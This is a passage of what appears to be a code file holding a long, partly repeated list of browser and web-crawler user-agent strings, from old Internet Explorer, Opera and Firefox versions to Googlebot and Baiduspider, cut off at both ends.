MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57', 'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0', 'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g', 'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125', 'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)', 'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)', 'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)', 'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0', 'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10', 'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)', 'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16', 'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)', 'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7', 'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0', 'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)', 'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)', 'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10', 'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)', 'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007', 'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57', 'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0', 'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g', 'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125', 'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)', 'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)', 'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)', 'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0', 'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10', 'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)', 'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16', 'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)', 'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7', 'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0', 'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)', 'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)', 'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10', 'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)', 'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007', 'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179', 'Mozilla/5.0 (compatible; 008/0.83; http://www.80legs.com/webcrawler.html) Gecko/2008032620', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) AddSugarSpiderBot www.idealobserver.com', 'Mozilla/5.0 (compatible; AnyApexBot/1.0; +http://www.anyapex.com/bot.html)', 'Mozilla/4.0 (compatible; Arachmo)', 'Mozilla/4.0 (compatible; B-l-i-t-z-B-O-T)', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)', 'Mozilla/5.0 (compatible; BecomeBot/2.3; MSIE 6.0 compatible; +http://www.become.com/site_owners.html)', 'BillyBobBot/1.0 (+http://www.billybobbot.com/crawler/)', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 'Sqworm/2.9.85-BETA (beta_release; 20011115-775; i686-pc-linux-gnu)', 'Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)', 'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)', 'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )', 'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )', 'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.zyborg@looksmart.net; http://www.WISEnutbot.com)', 'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.dlc@looksmart.net; http://www.WISEnutbot.com)', 'Mozilla/4.0 compatible ZyBorg/1.0 (wn-16.zyborg@looksmart.net; http://www.WISEnutbot.com)', 'Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)', 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser 1.98.744; .NET CLR 3.5.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; Acoo Browser; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Avant Browser)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.1; .NET CLR 3.5.30729; .NET CLR 3.0.30618)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Acoo Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko, Safari/419.3) Cheshire/1.0.ALPHA', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) ChromePlus/4.0.222.3 Chrome/4.0.222.3 Safari/532.2', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 ChromePlus/1.5.1.1', 'Links (2.7; Linux 3.7.9-2-ARCH x86_64; GNU C 4.7.1; text)', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A', 'Mozilla/5.0 (PLAYSTATION 3; 3.55)', 'Mozilla/5.0 (PLAYSTATION 3; 2.00)', 'Mozilla/5.0 (PLAYSTATION 3; 1.00)', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:24.0) Gecko/20100101 Thunderbird/24.4.0', 'Mozilla/5.0 (compatible; AbiLogicBot/1.0; +http://www.abilogic.com/bot.html)', 'SiteBar/3.3.8 (Bookmark Server; http://sitebar.org/)', 'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)', 'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)', 'Mozilla/4.0 (compatible; WebCapture 3.0; Macintosh)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (FM Scene 4.6.1)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729) (Prevx 3.0.5) ', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.8) Gecko/20071004 Iceweasel/2.0.0.8 (Debian-2.0.0.6+2.0.0.8-Oetch1)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {1C69E7AA-C14E-200E-5A77-8EAB2D667A07})', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; acc=baadshah; acc=none; freenet DSL 1.1; (none))', 'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.51', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; snprtz|S26320700000083|2600#Service Pack 1#2#5#154321|isdn)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Alexa Toolbar; mxie; .NET CLR 1.1.4322)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; ja-jp) AppleWebKit/417.9 (KHTML, like Gecko) Safari/417.8', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20051010 Firefox/1.0.7 (Ubuntu package 1.0.7)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57', 'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0', 'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g', 'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125', 'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)', 'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)', 'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)', 'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0', 'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10', 'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)', 'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16', 'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)', 'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7', 'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0', 'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)', 'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)', 'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10', 'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)', 'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007', 'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)', 'Googlebot/2.1 (http://www.googlebot.com/bot.html)', 'Opera/9.20 (Windows NT 6.0; U; en)', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061205 Iceweasel/2.0.0.1 (Debian-2.0.0.1+dfsg-2)', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)', 'Opera/10.00 (X11; Linux i686; U; en) Presto/2.2.0', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16', 'Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101209 Firefox/3.6.13', 'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)', 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)', 'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)', 'Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)', 'YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)', 'Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.27; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.21; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; 